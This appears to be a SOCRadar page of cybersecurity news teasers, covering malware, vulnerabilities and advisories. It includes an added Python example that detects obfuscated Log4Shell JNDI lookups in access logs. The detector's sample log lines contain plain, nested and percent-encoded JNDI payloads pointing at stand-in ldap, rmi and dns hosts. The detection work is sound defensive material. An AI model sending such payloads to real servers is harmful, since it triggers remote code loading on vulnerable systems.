Latest articles from SOCRadar
A short while ago, a joint cybersecurity advisory released by several national cybersecurity agencies highlighted the ten attack vectors threat actors most often use to gain access to networks. Threat actors take advantage of outdated systems, external… Continue Reading
We are hearing the two buzzwords DevSecOps and DevOps more and more often. Gartner, for example, predicts that DevSecOps will reach mainstream adoption within two to five years, which means we will hear about them even more… Continue Reading
Microsoft reported that the networks of hundreds of organizations have already been compromised by the Windows worm Raspberry Robin. Several security researchers first documented Raspberry Robin in 2021, and Microsoft has seen evidence of it going back to 2019. Raspberry Robin acts like… Continue Reading
Cybercrime is a threat that closely concerns public authorities, companies, and residents in Denmark, as it does around the world. The fact that threat actors adapt rapidly to the "new normal," improve their skills, and… Continue Reading
The cybersecurity agenda is shaken every day by brand-new threats and methods developed by malicious actors. The effects of these developments in attack techniques are felt most in countries where capital is concentrated,… Continue Reading
A new version of Raccoon Stealer has been released. The first version was seen in 2019 and was sold as malware-as-a-service (MaaS). The operation was shut down on March 25, following the death of one of… Continue Reading
Network Performance Monitoring (NPM) is the practice of assessing the quality of service a network delivers to its users by measuring, visualizing, monitoring, diagnosing, optimizing, and reporting on it. NPM aims to identify congestion, maximize throughput, and improve… Continue Reading
The newly emerged Android banking trojan Revive mimics BBVA bank's two-factor authentication app. Although still in early development, the malware is already capable of phishing and account takeover via keylogging. According to Cleafy's research, when the trojan… Continue Reading
Cybersecurity researchers have discovered Python packages in the PyPI repository that engage in malicious activity. The malicious packages send sensitive data, including AWS credentials, to internet-facing endpoints. In May, malicious activities were… Continue Reading
The Log4Shell RCE vulnerability, tracked as CVE-2021-44228, continues to be exploited by state-backed threat actors, who use it to target VMware Horizon and Unified Access Gateway servers. By exploiting Log4Shell, attackers can gain… Continue Reading
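Detection logic for the exploitation described above, as an added example that is not SOCRadar's code or the advisory's: naive matching on the literal string `${jndi:` misses the nested-lookup and percent-encoded forms attackers actually send, so the scanner first peels those layers and then flags any line that still contains a JNDI lookup. The access-log lines, field layout and regexes are constructed for this example.

```python
import re
import urllib.parse

# Obfuscations commonly seen in Log4Shell payloads, resolved before matching:
#   ${lower:J} -> j, ${upper:j} -> J, ${env:NOPE:-j} and ${::-j} -> j (default-value lookups),
#   plus percent-encoding in request lines (%24%7Bjndi...).
_LOWER = re.compile(r"\$\{\s*lower:([^{}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{\s*upper:([^{}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")

# A JNDI lookup using one of the protocols Log4j 2 can resolve.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE)


def normalize(s: str, rounds: int = 8) -> str:
    """Peel nested lookups and URL-encoding one layer per round until the text stops changing."""
    for _ in range(rounds):
        before = s
        s = urllib.parse.unquote(s)
        s = _LOWER.sub(lambda m: m.group(1).lower(), s)
        s = _UPPER.sub(lambda m: m.group(1).upper(), s)
        s = _DEFAULT.sub(lambda m: m.group(1), s)
        if s == before:
            break
    return s


def scan_log(lines):
    """Return (line_number, protocol) for every line that contains a JNDI lookup after normalization."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _JNDI.search(normalize(line))
        if m:
            hits.append((n, m.group(1).lower()))
    return hits


# Constructed access-log lines (not real traffic). Lines 1 and 5 are benign; lines 2-4 carry
# a plain, a nested-lookup and a percent-encoded JNDI payload respectively.
SAMPLE_LOG = [
    '203.0.113.10 - - [21/Jun/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [21/Jun/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 2048 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.7 - - [21/Jun/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 2048 "-" "${${lower:j}ndi:${lower:r}mi://198.51.100.7:1099/b}"',
    '198.51.100.7 - - [21/Jun/2022:10:01:12 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2Fexample.test%2Fc%7D HTTP/1.1" 400 0 "-" "curl/7.68.0"',
    '203.0.113.10 - - [21/Jun/2022:10:01:15 +0000] "GET /static/app.js HTTP/1.1" 304 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, proto in scan_log(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup via {proto}")
```

The normalization is deliberately bounded (`rounds`) so a hostile line cannot keep the scanner looping; any hit should be treated as attempted exploitation regardless of the response code, because the lookup is evaluated when the string is logged, not when the request succeeds.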
Have you ever wondered how hackers find the IPs, ports, and services they need for their attacks? Some attacks require scanning thousands of hosts to find the vulnerable ones. Hackers do not need sophisticated tools to… Continue Reading
Today, as a result of digitalization, most information is stored online. This creates exposure for organizations, because the number of cyberattacks aimed at stealing that data is increasing daily. One example of… Continue Reading
A new NTLM relay attack on Windows, DFSCoerce, has been discovered. By abusing MS-DFSNM (Microsoft Distributed File System Namespace Management) to coerce a domain controller into authenticating to an attacker-controlled host, and relaying that NTLM authentication to Active Directory Certificate Services (AD CS), threat actors can take over an entire Windows domain. To take over… Continue Reading
SOCRadar will be at Infosecurity Europe, held at ExCeL London this week, 21 to 23 June. We are very excited to meet you face to face at our booth, V38. Visit us to gain… Continue Reading
Originally a banking trojan, BRATA has acquired new capabilities and become a more advanced threat. The malware can now be much more effective at stealing user information. Cleafy's analysis shows that BRATA's activity pattern closely resembles that of an APT… Continue Reading
Cybersecurity researchers have revealed that Sophos Firewall has been actively exploited by the DriftingCloud APT group since early March. The attacks began before the CVE-2022-1040 vulnerability was patched, and the flaw affects v18.5 and older versions of… Continue Reading
Cisco has fixed a vulnerability in the external authentication functionality of Secure Email and Web Manager. The flaw could allow threat actors to bypass authentication and log in to the web management interface. The vulnerability, tracked as… Continue Reading
Microsoft has released its June 2022 Patch Tuesday updates, patching 55 vulnerabilities, including CVE-2022-30190, nicknamed Follina, the MSDT flaw that is exploited through Office documents. Among the fixed vulnerabilities are 27 RCE and 12… Continue Reading
The newly discovered Linux malware Symbiote can infect and hide in almost any process on a compromised system. It steals account credentials and gives attackers backdoor access. Symbiote is stored on the system after… Continue Reading
The Kingdom of Saudi Arabia (KSA) has launched a digital transformation program focused on the banking industry. With the growing digitization of financial services, securing the availability of sensitive data, transactions, and services has become… Continue Reading